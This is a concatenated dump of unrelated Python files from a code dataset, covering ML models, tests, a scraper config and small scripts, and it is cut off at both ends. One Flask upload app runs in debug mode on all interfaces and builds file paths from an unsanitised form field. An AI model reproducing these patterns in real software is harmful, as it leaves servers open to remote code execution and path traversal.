round(pvalues[i],3)\nprint('Pvalues:')\nprint(pvalues)\n\n\n\n\n","sub_path":"work/gaia_data/panstarrs1/robust_regression/robust_best_old_ps1.py","file_name":"robust_best_old_ps1.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"609805719","text":"def no_dups(s):\n # base case for error handling\n # if s == \"\":\n # return \"\"\n # dictionary that maps the unique word order (not the count)\n # against the word, ex: {\"we\": 0, \"are\": 1, ...}\n # d = {}\n # # keep a counter of each unique word's order\n # i = 0\n # # iterate over every word\n # for word in s.split():\n # if word in d:\n # # if we've already seen the word, DO NOTHING!\n # continue\n # else:\n # # store the relative order, i, into our dictionary\n # d[word] = i\n # # increment order counter\n # i += 1\n # this code was written to handle situations where the list did not\n # come out correctly sorted, but proved to be unnecessary\n # d = {v: k for k, v in d.items()}\n # l = [None] * i\n # for j in range(0, i):\n # l[j] = d[j]\n # l = [word for word, _ in d.items()]\n\n # in the end, none of the above code was really necessary, except to utilize\n # a dictionary, which I felt was the pedagogical prupose of the project\n l = []\n for word in s.split():\n if word in l:\n continue\n else:\n l.append(word)\n return \" \".join(l)\n\n\nif __name__ == \"__main__\":\n print(no_dups(\"\"))\n print(no_dups(\"hello\"))\n print(no_dups(\"hello hello\"))\n print(no_dups(\"cats dogs fish cats dogs\"))\n print(no_dups(\"spam spam spam eggs spam sausage spam spam and spam\"))\n print(no_dups(\"banana apple banana app banan taco banan ban banana tac taco taco app apple banana ban taco\"))\n","sub_path":"applications/no_dups/no_dups.py","file_name":"no_dups.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"385389855","text":"from django.test import TestCase\nfrom simulador.models import Consulta\n\n\nclass UsuarioModelTest(TestCase):\n @classmethod\n def setUpData(cls):\n Consulta.objects.create(id=10,nombre = \"Cesar\",email=\"jnomartinez99@gmail.com\", mensaje=\"soy un mensajito indefenso\")\n def test_nombre_label(self):\n consu= Consulta.objects.get(nombre = 'Cesar')\n field_label = consu._meta.get_field('nombre').verbose_name\n self.assertEquals(field_label,'nombre')","sub_path":"simulador/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"572193241","text":"\n\nfrom xai.brain.wordbase.nouns._tumult import _TUMULT\n\n#calss header\nclass _TUMULTS(_TUMULT, ):\n\tdef __init__(self,): \n\t\t_TUMULT.__init__(self)\n\t\tself.name = \"TUMULTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tumult\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tumults.py","file_name":"_tumults.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"257586560","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom ..utils import downsample_block\n\n\nclass P2PDiscriminator(nn.Module):\n def __init__(self, img_size, in_channels=3):\n super(P2PDiscriminator, self).__init__()\n\n self.model = nn.Sequential(\n *downsample_block(in_channels * 2, 64, bn=False),\n *downsample_block(64, 128),\n *downsample_block(128, 256),\n *downsample_block(256, 512),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(512, 1, 4, padding=1, bias=False)\n )\n\n def forward(self, img_A, img_B):\n img_input = torch.cat((img_A, img_B), 1)\n return self.model(img_input)\n\n","sub_path":"torch_gan/discriminators/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"335312969","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nhist_types = [\"grayvalue\", \"rg\", \"rgb\", \"dxdy\"]\ndist_types = [\"chi2\", \"intersect\", \"l2\"]\ncolors = [\"r\", \"g\", \"b\"]\n\nfor index, hist_type in enumerate(hist_types):\n plt.subplot(2, 2, index+1)\n for idx, dist_type in enumerate(dist_types):\n path = r\"./rpc_{}_{}.csv\".format(hist_type, dist_type)\n data = np.genfromtxt(path, delimiter=\";\", names=[\"recall\", \"precision\"])\n\n plt.plot(data[\"precision\"], data[\"recall\"], color=colors[idx])\n\n plt.title(hist_type + \" histogram\")\n plt.axis([0, 1, 0, 1]);\n plt.xlabel('1 - precision');\n plt.ylabel('recall');\n plt.legend(dist_types, loc='best')\n\nplt.show()\n\nfor index, hist_type in enumerate([\"rg\", \"rgb\"]):\n for idx, dist_type in enumerate(dist_types):\n path = r\"./rpc_{}_{}.csv\".format(hist_type, dist_type)\n data = np.genfromtxt(path, delimiter=\";\", names=[\"recall\", \"precision\"])\n plt.plot(data[\"precision\"], data[\"recall\"], label=\"{} - {}\".format(hist_type, dist_type))\n \nplt.title(\"RG histogram vs RGB histogram\")\nplt.axis([0, 1, 0, 1]);\nplt.xlabel('1 - precision');\nplt.ylabel('recall');\nplt.legend()\nplt.show()\n","sub_path":"Assignment1/Identification/rpc_results/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"482340965","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default='ru',\n help=\"Choose browser: chrome or firefox\")\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n user_language = request.config.getoption(\"--language\")\n print(f\"\\nstart browser for test in {user_language}\")\n options = Options()\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n link = f\"http://selenium1py.pythonanywhere.com/{user_language}/catalogue/coders-at-work_207/\"\n browser.get(link)\n time.sleep(30)\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"164203739","text":"from flask import Flask, flash, make_response, render_template, request, redirect, escape, jsonify, Response, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES\nimport json\nimport os\nimport datetime\nimport pathlib\nfrom functions import *\nfrom werkzeug.utils import secure_filename\nimport pprint\nfrom PIL import Image\n\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])\n\napp = Flask(__name__)\n\nbasedir = pathlib.Path.cwd()\n\n\n@app.route('/')\ndef home():\n\treturn 'You suck'\n\n@app.route('/gregory')\ndef gregory():\n\tresp = make_response('howdy')\n\tresp.set_cookie('family', 'gregory')\n\treturn resp\n\n@app.route('/havens')\ndef havens():\n\tresp = make_response('howdy')\n\tresp.set_cookie('family', 'havens')\n\treturn resp\n\n@app.route('/status')\ndef status():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\treturn 'The family is ' + family\n\telse:\n\t\treturn redirect(url_for('home'))\n\n@app.route('/activity_picker')\ndef activity_picker():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\treturn render_template('activity_picker.html', data=data)\n\telse:\n\t\tredirect(url_for('home'))\n\n@app.route('/apply_activity', methods=['POST'])\ndef apply_activity():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\tactivity_selected = request.form['activity_selected']\n\t\tcurrent_activity = pull_activity_dict(activity_selected, data)\n\t\treturn render_template('collect_info.html', current_activity=current_activity)\n\n\telse:\n\t\tredirect(url_for('home'))\n\nphotos = UploadSet('photos', IMAGES)\napp.config['UPLOADED_PHOTOS_DEST'] = basedir / 'static' / 'long_term_storage' / 'uploads'\nconfigure_uploads(app, photos)\n\n@app.route('/confirm_info', methods=['POST'])\ndef confirm_info():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\tactivity_selected = request.form['activity_selected']\n\t\tprint(family)\n\t\tprint(activity_selected)\n\t\tcurrent_activity = pull_activity_dict(activity_selected, data)\n\t\ttry:\n\t\t\tdetails_input_data = request.form['details_input']\n\t\t\tprint('details_input: ' + details_input_data)\n\t\t\tcurrent_activity['details_input'] = details_input_data\n\t\texcept:\n\t\t\tpass\n\n\n\t\tall_form_data = request.form\n\t\tprint(all_form_data)\n\t\tphoto_target = basedir / 'static' / 'long_term_storage' / family\n\t\tprint(photo_target)\n\t\tif request.method == 'POST' and 'photo' in request.files:\n\t\t\ttry:\n\t\t\t\tfilename = photos.save(request.files['photo'])\n\t\t\t\tprint(filename)\n\t\t\t\talert_box_class = 'nice_message'\n\t\t\t\tresults = 'SUCCESS! If you would like to upload another, please do so now.'\n\t\t\texcept:\n\t\t\t\talert_box_class = 'error_message'\n\t\t\t\tresults = 'You have tried to upload a filetype other than PNG, please try again.'\n\t\t\t\treturn render_template('upload.html', results=results, alert_box_class=alert_box_class)\n\n\t\tphoto_description = '-' + request.form['photo_description']\n\t\tprint('photo description: ' + photo_description)\n\t\trecent_photo_location = basedir / 'static' / 'long_term_storage' / 'uploads' / filename\n\t\tcurrent_suffix = recent_photo_location.suffix\n\t\tprint(recent_photo_location)\n\t\tphoto_name = current_activity['Activity'].replace(\" \", \"_\")\n\t\tphoto_name = photo_name[:20]\n\t\tphoto_name_plus_description = photo_name + photo_description + current_suffix\n\t\trecent_photo_new_name = basedir / 'static' / 'long_term_storage' / 'uploads' / photo_name_plus_description\n\t\trecent_photo_new_location = basedir / 'static' / 'long_term_storage' / family / 'photos' / photo_name_plus_description\n\t\tos.rename(recent_photo_location, recent_photo_new_name)\n\t\twith recent_photo_new_location.open(mode='xb') as f:\n\t\t\tf.write(recent_photo_new_name.read_bytes())\n\t\trecent_photo_new_name.unlink()\n\n\t\tif 'photo_list' not in current_activity:\n\t\t\tcurrent_activity['photo_list'] = []\n\t\t\tprint('created photo_list list')\n\t\tcurrent_activity['photo_list'].append(photo_name_plus_description)\n\t\tsize = 300, 300\n\n\t\tthumbnail_name_plus_description = photo_name + photo_description + '_thumb' + current_suffix\n\t\trecent_photo_new_thumb_location = basedir / 'static' / 'long_term_storage' / family / 'thumbs' / thumbnail_name_plus_description\n\t\tim = Image.open(recent_photo_new_location)\n\t\tim.thumbnail(size)\n\t\tim.save(recent_photo_new_thumb_location)\n\n\t\tif 'thumb_list' not in current_activity:\n\t\t\tcurrent_activity['thumb_list'] = []\n\t\t\tprint('created thumb_list list')\n\t\tcurrent_activity['thumb_list'].append(thumbnail_name_plus_description)\n\n\t\tcurrent_activity['is_complete'] = True\n\n\t\tpush_activity_dict(current_activity, data, family, basedir)\n\n\t\tpprint.pprint(current_activity)\n\t\treturn render_template('collect_info.html', current_activity=current_activity, results=results, alert_box_class=alert_box_class)\n\n\telse:\n\t\tredirect(url_for('home'))\n\nif __name__ == '__main__':\n\t# app.run()\n\tapp.run(debug=True, host='0.0.0.0')\n","sub_path":"old-venture.py","file_name":"old-venture.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"249044259","text":"import json\n\nfrom flask import (Blueprint, jsonify, request)\n\nfrom pricing_service.api.models import Product, VATBand\n\napi = Blueprint('api', __name__)\n\n\ndef product_lookup(all_products, product):\n product_id = product.get('product_id', 0)\n product_obj = all_products.get(product_id)\n return product_obj\n\n\ndef product_sub_total(price, quantity):\n return round(price * quantity) \n\n\ndef vat_band(vatband, price):\n return round(price * vatband.rate)\n\n\n@api.route('/products', methods=['POST'])\ndef post_products():\n all_products = {product.id: product for product in \\\n Product.query.all()}\n data = request.json\n response_data = {}\n prices = []\n price_total = 0\n vat_total = 0\n for product in data['order']['items']:\n product_obj = product_lookup(all_products, product)\n sub_total = product_sub_total(product_obj.price, product['quantity'])\n vat = vat_band(product_obj.vatband, sub_total)\n price_total += sub_total\n vat_total += vat\n prices.append({'product_id': product_obj.id,\n 'sku': product_obj.sku,\n 'name': product_obj.name,\n 'quantity': product['quantity'],\n 'price': sub_total,\n 'vat': vat, \n 'vat_band': product_obj.vatband.name})\n \n response_data['prices'] = prices\n response_data['totals'] = {'vat': vat_total, 'price': price_total}\n response_data['vat_bands'] = {band.name: band.rate for band in \\\n VATBand.query.all()}\n return jsonify(response_data)\n","sub_path":"pricing_service/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371059771","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for dob project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'dob'\n\nSPIDER_MODULES = ['dob.spiders']\nNEWSPIDER_MODULE = 'dob.spiders'\nITEM_PIPELINES = {\n\t'dob.pipelines.dobItemPipeline':300,\n\t'dob.pipelines.PostAvatarPipeline':200,\n\t}\nIMAGES_STORE = '/root/dobImage'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'dob (+http://www.yourdomain.com)'\nDOWNLOAD_DELAY = 4\nRANDOMIZE_DOWNLOAD_DELAY = True\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 OPR/23.0.1522.60\"\nCOOKIES_ENABLED = False\nDOWNLOADER_MIDDLEWARES ={\n 'scrapy.contrib.downloadermiddleware.httpproxy.HttpProxyMiddleware': 543,\n\t#'dob.middlewares.ProxyMiddleware': 100,\n}","sub_path":"dobspider/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"120489347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\nfrom loglizer.models import DecisionTree\nfrom loglizer import dataloader, preprocessing\n\nstruct_log = '../data/HDFS/HDFS_100k.log_structured.csv' # The structured log file\nlabel_file = '../data/HDFS/anomaly_label.csv' # The anomaly label file\n\nif __name__ == '__main__':\n (x_train, y_train), (x_test, y_test) = dataloader.load_HDFS(struct_log,\n label_file=label_file,\n window='session', \n train_ratio=0.5,\n split_type='uniform')\n\n feature_extractor = preprocessing.FeatureExtractor()\n x_train = feature_extractor.fit_transform(x_train, term_weighting='tf-idf')\n x_test = feature_extractor.transform(x_test)\n\n model = DecisionTree()\n model.fit(x_train, y_train)\n\n print('Train validation:')\n precision, recall, f1 = model.evaluate(x_train, y_train)\n\n print('Test validation:')\n precision, recall, f1 = model.evaluate(x_test, y_test)\n","sub_path":"demo/DecisionTree_demo.py","file_name":"DecisionTree_demo.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"353482645","text":"import tensorflow as tf\nimport numpy as np\nimport csv\nimport cv2 \nimport json\nimport h5py\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Activation, Dense, Dropout, ELU, Flatten, Input, Lambda\nfrom keras.layers.convolutional import Convolution2D, Cropping2D\nfrom keras.models import Sequential, Model, load_model, model_from_json\nfrom keras.regularizers import l2\n\nfrom preprocessing import preprocess, flipImg\nfrom utils import get_data, validAngle, getRandImgAndAngle\n\n# Weird workaround for cuda error, but it is working :) \nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\nBATCH_SIZE = 64\nEPOCHS = 1\n\ndef model_nvidia():\n \"\"\"\n Model according to the given Nvidia paper. Has to be defined here due to weird unicode error when model.save \n Note. Model has to be defined here for the model.save_weights, it can't be split into a different file.\n \"\"\"\n weights_regularizer=l2(0.001)\n\n model = Sequential()\n # Image Normalization -> lambda used\n model.add(Lambda(lambda x: x / 127.5 - 1., input_shape=(66, 200, 3)))\n model.add(Convolution2D(24, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.1))\n model.add(Convolution2D(36, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.2))\n model.add(Convolution2D(48, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.2))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='elu', subsample=(1, 1), init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.2))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='elu', subsample=(1, 1), init='he_normal', W_regularizer=weights_regularizer))\n\n model.add(Flatten())\n model.add(Dropout(.3))\n model.add(Dense(100, activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.5))\n model.add(Dense(50, activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.5))\n model.add(Dense(10, activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n model.add(Dropout(.5))\n model.add(Dense(1, activation='linear', init='he_normal'))\n\n model.compile(optimizer='adam', loss='mse',metrics=['accuracy'])\n model.summary()\n return model\n\ndef get_batch(X_train, y_train):\n \"\"\"\n Generate the batch for training with the data (X_train) and the corresponding grouth truth\n X_train(names):center_img.strip(), left_img.strip(), right_img.strip() \n y_train:angle, angle+steer_offset, angle-steer_offset\n Returns: A list of image(filenames) and steeringAngles -> only for one batch\n \"\"\"\n imgList = np.zeros((BATCH_SIZE, 66, 200, 3), dtype=np.float32)\n steeringAngleList = np.zeros((BATCH_SIZE,), dtype=np.float32)\n\n while True:\n for i in range(BATCH_SIZE):\n lowAngle_counter = 0\n\n # Get a valid angle (not low angle when the percentage of lowangle in the batch is already exceeded)\n while True:\n imgFileName, angle = getRandImgAndAngle(X_train,y_train)\n if not validAngle(angle, lowAngle_counter, BATCH_SIZE):\n # Get a new data -> this one is not working\n continue\n else:\n # Fine. Increase and you shall pass ;)\n lowAngle_counter += 1\n break\n\n # Read image\n image = cv2.imread(imgFileName)\n # Preprocess\n image = preprocess(image)\n # Flip the image (sometimes)\n imgList[i],steeringAngleList[i]=flipImg(image,angle)\n\n yield imgList, steeringAngleList\n\n\nif __name__==\"__main__\":\n # Get the training data from log file, shuffle, and split into train/validation datasets\n X_train, X_validation, y_train, y_validation = get_data()\n\n # Get model, print summary, and train using a generator\n model = model_nvidia()\n model.fit_generator(get_batch(X_train, y_train), samples_per_epoch=24000, nb_epoch=20, validation_data=get_batch(X_validation, y_validation), nb_val_samples=1024)#, callbacks=[early_stop])\n \n print('Training finished, model will be save to model.h5 and model.json. Call python drive.py model.json to drive in autonomous mode.')\n # Save weights to h5 and model architecture to json \n model.save_weights('model.h5')\n with open('model.json', 'w') as outfile:\n json.dump(model.to_json(), outfile)\n\n print('The End.')","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131512936","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport array\nimport struct\nimport svgwrite\n\nclass SmakyFont(object):\n\tdef __init__(self, filename):\n\t\twith open(filename, \"rb\") as rawFile:\n\t\t\trawFile.read(256)\n\t\t\tself.__header = rawFile.read(256)\n\t\t\ttuples=struct.unpack(\">HBBHHBBBBHHHHHHH4BHHHH90s128s\", self.__header)\n\t\t\tself.__byteSize = tuples[3]\n\t\t\tself.__matrixHeight = tuples[4]\n\t\t\tself.__byteWidth = tuples[5]\n\t\t\tself.__leftMargin = tuples[6]\n\t\t\tself.firstGlyph = tuples[7]\n\t\t\tself.lastGlyph = tuples[8]\n\t\t\tself.__leftMargin = tuples[9]\n\t\t\t\n\t\t\tself.baseline=tuples[10]\n\t\t\tself.h1 = tuples[11]\n\t\t\tself.h2 = tuples[12]\n\t\t\tself.w = tuples[13]\n\t\t\t\n\t\t\tself.glyphCount = self.lastGlyph - self.firstGlyph+1\n\t\t\t\n\t\t\tself.__widths = array.array(\"B\", rawFile.read(self.glyphCount))\t\t\t\n\t\t\tself.__h1 = array.array(\"B\", rawFile.read(self.glyphCount))\n\t\t\tself.__h2 = array.array(\"B\", rawFile.read(self.glyphCount))\n\t\t\tself.__bitmaps=array.array(\"B\", rawFile.read(self.__byteSize * self.glyphCount))\n\t\n\tdef __getitem__(self, i):\n\t\tx = self.__bitmaps[self.__byteSize*i : self.__byteSize*(i+1)]\n\t\treturn SmakyGlyph(i+self.firstGlyph, x, self.__byteWidth, self.__leftMargin,\n\t\t\t\t\t self.__widths[i], self.__h1[i], self.__h2[i])\n \n\nclass SmakyGlyph(object):\n\tdef __init__(self, ascii, bitmap, byteWidth, margin, w, h1, h2):\n\t\tself.ascii = ascii \n\t\tself.bitmap = bitmap\n\t\tself.byteWidth = byteWidth\n\t\tself.margin=margin\n\t\tself.w = w\n\t\tself.h1 = h1\n\t\tself.h2 = h2\n\t\t\n\tdef print(self):\n\t\tprint(u\"Caractère {c} {w}x{h}\".format(c=chr(self.ascii), w=self.w, h=self.h1+self.h2))\n\t\tfor i in range(0, self.h1+self.h2):\n\t\t\trow = self.bitmap[i*self.byteWidth : (i+1)*self.byteWidth]\n\t\t\timage = \"\"\n\t\t\tfor j in range(0, self.w):\n\t\t\t\tbit = row[j >> 3] & (128 >> (j%8))\n\t\t\t\tif (bit):\n\t\t\t\t\timage = image + \"*\"\n\t\t\t\telse:\n\t\t\t\t\timage = image + \".\"\n\t\t\tprint(image)\n\t\t\t\t\t\t\t\nfont = SmakyFont(\"/Users/jmp/Archives/Smaky/Raw/systeme/sma_cap12.genc\")\nprint(\"{count} symboles, dimensions max {w}x{h}\"\n\t.format(count=font.glyphCount, h=font.h1+font.h2, w=font.w))\n\noutput = svgwrite.Drawing(\"output.svg\", profile=\"tiny\")\ndx = round(1024/max((font.h1+font.h2), font.w))\nfor i in range(font.firstGlyph, font.lastGlyph):\n\tox = 1024*(i%11)\n\toy = 1024*round(i/11)\n\tglyph = font[i]\n\tfor j in range(0, glyph.h1 + glyph.h2):\n\t\trow = glyph.bitmap[j*glyph.byteWidth : (j+1)*glyph.byteWidth]\n\t\tfor k in range(0, glyph.w):\n\t\t\tbit = row[k >> 3] & (128 >> (k%8))\n\t\t\tif bit:\n\t\t\t\toutput.add(output.rect(insert=(ox+dx*k, oy+dx*j), \n\t\t\t\t\t\t size=(round(0.9*dx), round(0.9*dx)), fill='black'))\noutput.save()\n\n\n","sub_path":"genc2svg.py","file_name":"genc2svg.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"475905311","text":"# -*- coding: utf-8 -*-\n# @Author: liusongwei\n# @Date: 2020-09-26 15:11:39\n# @Last Modified by: liusongwei\n# @Last Modified time: 2020-10-12 01:07:24\n\nimport torch \nimport torch.nn as nn \nimport torch.autograd.function as Function\nimport torch.nn.functional as F\nimport binaryfunction\n\n\n\nclass XNORConv2d_1w1a(nn.Conv2d):\n '''\n XNOR 1w1a conv2d layers\n '''\n def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=False):\n super(XNORConv2d_1w1a, self).__init__(in_channels,out_channels,\n kernel_size=kernel_size,stride=stride,padding=padding,\n dilation=dilation,groups=groups,bias=bias)\n\n def forward(self, input):\n\n # w_b = a * sign(w)\n bw = binaryfunction.BinaryFunc().apply(self.weight)\n scale_b = torch.mean(torch.abs(self.weight),dim=[1,2,3],keepdim=True).detach()\n #scale_b = self.weight.abs().view(self.weight.size(0), -1).mean(-1).view(self.weight.size(0),1,1,1).detach()\n scale_bw = bw * scale_b\n # input_b = sign(input)\n binput = binaryfunction.BinaryFunc().apply(input)\n boutput = F.conv2d(binput, scale_bw,bias=self.bias,\n stride=self.stride, padding=self.padding,\n dilation=self.dilation,groups=self.groups)\n # compute output scale feature map ()\n # Equal to the scaling factor for each activation value of the convolution fast\n os = self.getScaleFeatureMap(input)\n os = os.detach()\n output = boutput * os\n return output\n\n\n def getScaleFeatureMap(self,input):\n # N C H W --> N 1 H W\n # Compute channel abs mean\n input_mean = torch.mean(torch.abs(input),dim=1,keepdim=True)\n # N 1 H W ---> N 1 H` W`\n # Calculate the plane mean for each convolution block by convolution\n kernel = torch.ones((1,1,self.kernel_size[0],self.kernel_size[1])).to(input.device)\n kernel.data.mul_(1 / (self.kernel_size[0] *self.kernel_size[1]))\n input_mean = F.conv2d(input_mean, kernel, \n stride=self.stride, padding=self.padding,\n dilation=self.dilation,groups=self.groups)\n return input_mean\n\n\n\nclass XNORDense_1w1a(nn.Linear):\n def __init__(self,out_features,bias=True):\n super(XNORDense_1w1a, self).__init__(out_features=out_features,bias=bias)\n\n def forward(self, input):\n # w_b = a * sign(w)\n # dim(w)=DimIn*DimOUT dim(a)= 1*DimOUT\n bw = binaryfunction.BinaryFunc().apply(self.weight)\n scale_b = self.weight.abs().mean(0).view(1,self.weight.size(1)).detach()\n scale_bw = bw * scale_b\n # input_b = sign(input)\n # dim(input) = N*DimIn\n binput = binaryfunction.BinaryFunc().apply(input)\n # dim(a_input) = Nx1\n si = torch.mean(torch.abs(input),dim=1,keepdim=True).detach()\n scale_binput = binput * si\n output = F.linear(input=scale_binput, weight=scale_bw, bias=self.bias)\n return output\n\n\n\n\nclass XNORConv2d_1w32a(nn.Conv2d):\n '''\n XNOR 1w32a conv2d layers\n '''\n def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=False):\n super(XNORConv2d_1w32a, self).__init__(in_channels,out_channels,\n kernel_size=kernel_size,stride=stride,padding=padding,\n dilation=dilation,groups=groups,bias=bias)\n\n def forward(self, input):\n\n # w_b = a * sign(w)\n bw = binaryfunction.BinaryFunc().apply(self.weight)\n scale_b = torch.mean(torch.abs(self.weight),dim=[1,2,3],keepdim=True).detach()\n #scale_b = self.weight.abs().view(self.weight.size(0), -1).mean(-1).view(self.weight.size(0),1,1,1).detach()\n scale_bw = bw * scale_b\n boutput = F.conv2d(input, scale_bw,bias=self.bias,\n stride=self.stride, padding=self.padding,\n dilation=self.dilation,groups=self.groups)\n\n return boutput\n\n\n\nclass XNORDense_1w32a(nn.Linear):\n def __init__(self,out_features,bias=True):\n super(XNORDense_1w32a, self).__init__(out_features=out_features,bias=bias)\n\n def forward(self, input):\n # w_b = a * sign(w)\n # dim(w)=DimIn*DimOUT dim(a)= 1*DimOUT\n bw = binaryfunction.BinaryFunc().apply(self.weight)\n scale_b = self.weight.abs().mean(0).view(1,self.weight.size(1)).detach()\n scale_bw = bw * scale_b\n output = F.linear(input=input, weight=scale_bw, bias=self.bias)\n return output\n\n\n\nif __name__ == '__main__':\n\n testdata = torch.ones((3,1,3,3),requires_grad=True)\n testdata = testdata * torch.tensor([-2,-0.5,0.5]).unsqueeze(1).unsqueeze(2).unsqueeze(3).expand_as(testdata)\n\n conv1=XNORConv2d_1w1a(1,1,kernel_size=3,stride=1,padding=1)\n output=conv1(testdata)\n\n weight = torch.ones(output.size())\n grad = torch.autograd.grad(outputs=output,inputs=testdata,grad_outputs=weight)\n print(grad[0])\n\n\n\n\n","sub_path":"network_quantize/XNOR/xnor_layers.py","file_name":"xnor_layers.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"468817569","text":"import playhand\r\n\r\ndef main():\r\n #print (\"Welcome to the COSC 1336 collaborative \\\r\n # blackjack simulation thingy\")\r\n PlayAgain = \"Y\"\r\n wins = 0\r\n losses = 0\r\n while (PlayAgain == \"Y\"):\r\n if (playhand.PlayHand()):\r\n wins += 1\r\n else:\r\n losses += 1\r\n PlayAgain = input(\"\\nPlay again? (Y/N) \").upper()\r\n\r\n print('\\n\\nYou won',wins,'hands and lost',losses,'hands.')\r\n input('')\r\n\r\nmain()\r\n","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"535290590","text":"#Target Marbles\n\nq = [int(x) for x in input().split()]\nn = q[0]\nt = q[1]\na = [int(x) for x in input().split()]\n\nsum = 0 \nls = []\nfor i in a:\n #print('val: ',i)\n if sum == t:\n break;\n elif sum>t:\n sum = i\n ls.clear()\n ls.append(i)\n else:\n sum += i;\n ls.append(i)\n \n#print(sum)\nif sum == t:\n print('true')\n s = ''\n for i in ls:\n if len(s)>0:\n s = s +' '+str(i)\n else:\n s = str(i)\n print(s)\nelse:\n print('false')\n","sub_path":"DS/ARRAYS/array_problems.py","file_name":"array_problems.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"578772267","text":"from B14.Car import B14\nfrom CnAy.Plot import make_plot\nfrom CnAy.SteeringFunctions import BasicSteeringFunction, AntiAckermanB14, AntiAckermanB14RearWheelSteering\nfrom TireModel import tire_func\nimport numpy as np\n\ndef tire_func_b(x, y):\n return tire_func(x, y)\n\ndefault_params = {'a_x': 0.0, # g's\n 'toe_in_front': 0.0, # degrees\n 'toe_in_rear': 0.0, # degrees\n 'wheelbase': B14.wheels.wheel_base_m, # meters\n 'track_front': 